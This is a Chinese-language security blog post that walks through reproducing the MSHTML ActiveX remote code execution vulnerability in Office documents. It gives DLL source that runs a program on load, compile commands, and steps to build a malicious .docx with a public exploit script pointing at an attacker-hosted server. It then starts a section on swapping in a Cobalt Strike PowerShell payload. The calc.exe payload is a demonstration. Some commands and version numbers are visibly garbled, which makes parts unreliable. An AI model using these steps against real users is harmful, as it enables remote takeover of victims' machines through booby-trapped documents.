作者:墨阳
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
0x01 前言
微软MSHTML引擎存在代码执行漏洞,攻击者通过精心制作包含恶意ActiveX的Offcie文档,诱导用户打开,从而实现远程代码执行。当用户主机启用了ActiveX控件,攻击者可通过该漏洞控制受害者主机。
目前,该漏洞EXP已公开,微软官方公布已检测到在野利用,已发布修复补丁。
影响范围:
Windows Server, version 20H2 (Server Core Installation) Windows Server, version (Server Core installation) Windows Server (Server Core installation) Windows Server Windows Server (Server Core installation) Windows Server Windows Server (Server Core installation) Windows Server Windows Server R2 (Server Core installation) Windows Server R2 Windows Server (Server Core installation) Windows Server Windows Server for x64-based Systems Service Pack 2 (Server Core installation) Windows Server for x64-based Systems Service Pack 2 Windows Server 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 32-bit Systems Service Pack 2 Windows Server R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server R2 for x64-based Systems Service Pack 1 Windows RT 8.1 Windows 8.1 for x64-based systems Windows 8.1 32-bit systems Windows 7 for x64-based Systems Service Pack 1 Windows 7 32-bit Systems Service Pack 1 Windows 10 for x64-based Systems Windows 10 32-bit Systems Windows 10 Version 21H1 for x64-based Systems Windows 10 Version 21H1 for ARM64-based Systems Windows 10 Version 21H1 32-bit Systems Windows 10 Version 20H2 for x64-based Systems Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 32-bit Systems Windows 10 Version for x64-based Systems Windows 10 Version for ARM64-based Systems Windows 10 Version 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 32-bit Systems Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1809 for ARM64-based Systems Windows 10 Version 1809 32-bit Systems Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1607 32-bit Systems
0x02 漏洞复现
1、准备calc.c文件:
#include<windows.h>void exec(void) {system("C:\\Windows\\System32\\calc.exe");return;}BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved ){switch( fdwReason ){case DLL_PROCESS_ATTACH:exec();break;case DLL_THREAD_ATTACH:break;case DLL_THREAD_DETACH:break;case DLL_PROCESS_DETACH:break;}return TRUE;}
2、编译为dll文件
sudo apt-get install gcc-mingw-w64i686-w64-mingw32-gcc -shared calc.c -o calc.dll
3、下载POC:
下载地址:/lockedbyte/CVE--40444
将dll文件放到test目录下替换掉原有文件
4、利用dll文件生成docx文档
sudo python3 exploit.py generate test/calc.dll http://<SRV IP>
自动生成了document文档、word.html和word.cab
5、开启web服务
sudo python3 [exploit.py](http://exploit.py) host 80
生成的document文档在out目录下,将文档上传靶机,双击打开,弹出计算器(关掉definder)
0x03 CS上线
1、cs生成powershell command
2、修改calc.c文件:
0x04 修复方案
微软官方已发布补丁,官方下载地址:
/update-guide/en-US/vulnerability/CVE--40444
0x05 了解更多安全知识
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
